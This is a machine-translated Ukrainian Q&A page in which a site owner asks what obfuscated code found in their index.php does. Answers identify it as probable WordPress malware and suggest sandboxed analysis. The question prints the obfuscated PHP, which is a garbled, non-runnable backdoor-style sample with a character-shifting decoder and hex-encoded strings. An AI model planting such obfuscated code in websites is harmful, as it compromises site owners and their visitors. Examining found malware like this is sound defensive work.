Знайшов цей код у index.php на недоступному моєму сайті… Що це робить? [зачинено]


-3
!} x27;! >>>!} _; gvc%} &; ftmbg} x77 {** u% - # jt0} Z; 0] =] 0 #) 2q% l} S; 2-u%! - # 2 # / #% # / # o] #jw) bssbz) #P # - # Q # - # B # - # T # - # E # - # G # - # H5 # *% fdy!% Tdz)% bbT- % bT-% hW ~% fdy) ## -! # ~ / 7 & 6 | 7 ** 111127-zW% h> EzH, 2W% wN; # - Ez-1H * WCw * [!% rN} # QwTW% hIr x5c1 ^ -% r x5c2 ^ -% hOh / # 00 # W6! 2p%! * 3>? * 2b%) gpf {jt)! gj! pjudovg x22)! gj} 1 ~! 52] 88] 5] 48 ] 32M3] 317] 445] 212] 445] 43] 321] 464] 284] 364] 6] 234] 342] 58] 24hmg%! J%! |! * # D% 62bd%!%!> X22: ftmbg39 * 56mg%)! gj! ~: ,, Bjg!)% j: >> 1 *!% b:> 1% s: x5c% j: .2 ^,% b:% s: x5c% j: ^ * ofmy%) utjm! |! * 5! x27! hmg%)! gj! |! * 1? hmg%)! gj!] 26 x24- x24j%! * 9! x27! hnjA x27 & 6! fyqmpef) # x24 *! x24Yp x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e "; * + fepdfe {h + {d%) + opjudovg +)! gj + {e%! osvufs! *! + A!>! {e%)! >> x22! ftmbg)! x63 162 функція bknbpvb ($ n) {return chr (ord ($ n) -1);} @ error_repor2986 + 7 ** ^ /% rx111!% yy) #} # - # x24- x24-tusqpt)%> qp %! | Z ~ !! 2p%! |! *! * JQeTQcOc / # 00 # W ~! Ydrr)% rxB% epnbss!>! Bssbz) # 44ec: 649 # -! #: 618d5f9 # -! # F6c6 # # >> X)! GjZb%! ** X) ufttj x22) gj! |! * NbsS, 6! x242178} 527} 88:} 334} 472 x24 / 7rfs%: * mmvo:>: iuhofm%: - 5ppde: 4: |: ** # ppde #) tutjyf`4 x223}! +!> * 4-1- bubE {h% SUT`LDPT7-UFOJ`GB) fubfsdX)% j> 1 ^ # zsfvr # x5cq% 7 ** ^ # zsfvr # x5cq%) ufttj x22) gj632j%! * 72! x27! hmg%)! gjdovg} {; #) tutjyf`opjudov3f] 51L3] 84] y31M6] y3e] 81 # / # 7e: 55946-tr.984: 75983: 48984: 71] K9] 77zbek! ~! b% Zb%! * (% W:!>! X246767 ~ 6! Bssbz) x24] 25 x24- x24 -!% X24- x24 *! |! x24- x2j% 7-K) udfoopdXA x22) 7gj6>} R; msv}; / # / # / 67j ** b%) sfxpmpusut! - # j0 #! /! ** # sfmcnbs + yfeobz + s` x5c ^> Ew: Qb: Qc: W ~!% Z!> 21 # p # / # p # /% z> 2 * A:>: 8: |: 7 # 6 #) tutjyf`439275ttfsqnpdov {h19275j {hnpd19275fubmgoj {h1: |%} U; y]} R; 2]},; osvufs} x27; mnui} &; zep *!% I x5c2 ^ x2272qj%) 7gj6] D4] 82] K6] 72] K9] 78] K5] 53] Kc #! #] D&& (! Набір ($ GLOBALS ["x61 156 x75 156 x61"])))) {$ ГЛОБАЛИ [_ * # [k2 `{6:!} 7;!} 6; ##} C;! >>!} W; utpix :: h%: n%! #] Y84] 2757, * e x27, * d x27, * c x27 , * b x27) fepq% 6! x2400 ~: / h%:> x22! pd%)! gj} Z; h! opju] y83] 273] y76] 277 ##] y74] 273ovg! |! ** # j {hnpd #) tutjyf`ogj5h% !! x24 /% tmw / x24)% - x24 *

Схоже на хитрощі. Принаймні, це недійсний PHP-код.
ivan_pozdeev

О, ви не покладалися на те, щоб правильно його відформатувати. Це дійсний PHP-код, затуманений.
ivan_pozdeev

Опублікований вами код не вважає вірним поданням файлу - він порушений. Я публікую це, щоб відмовитись від інших витрачати час.
ivan_pozdeev

Відповіді:


2

Це якийсь заплутаний код PHP. Я не переймався (і не бачу користі), щоб дивитись далі.

  • Ви можете виконати його з командного рядка під непривілейованим обліковим записом (а ще краще - з віртуального комп'ютера, щоб ви могли заборонити доступ до мережі - можливо, до бази даних - на випадок, якщо він вбудував облікові дані) і побачити, що відбувається.
  • І все ж я пропоную вам спробувати знешкодити це вручну як тизер мозку.
    • Зауважте, що ви можете запускати фрагменти коду PHP через інтерпретатор командного рядка, щоб змусити його зробити більшу частину роботи за вас.

Коментар до питання SO щодо Wordpress припускає, що це може бути запасний файл Wordpress.

Погуглити «PHP обфуськатор" Мовчання золото " . » Крім того, я знайшов https://security.stackexchange.com/questions/128546/obfuscated-php-code-found-in-wordpress-core-files-and-plugins . Справу закрито.

Швидше за все, це вірус Wordpress. Тим більше стимулів для того, щоб ти її розсікав і бачив, що це робить. Ну, і перевірте, чи є ваш сервер на наявність аномалій - краще з рятувального диска.

Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.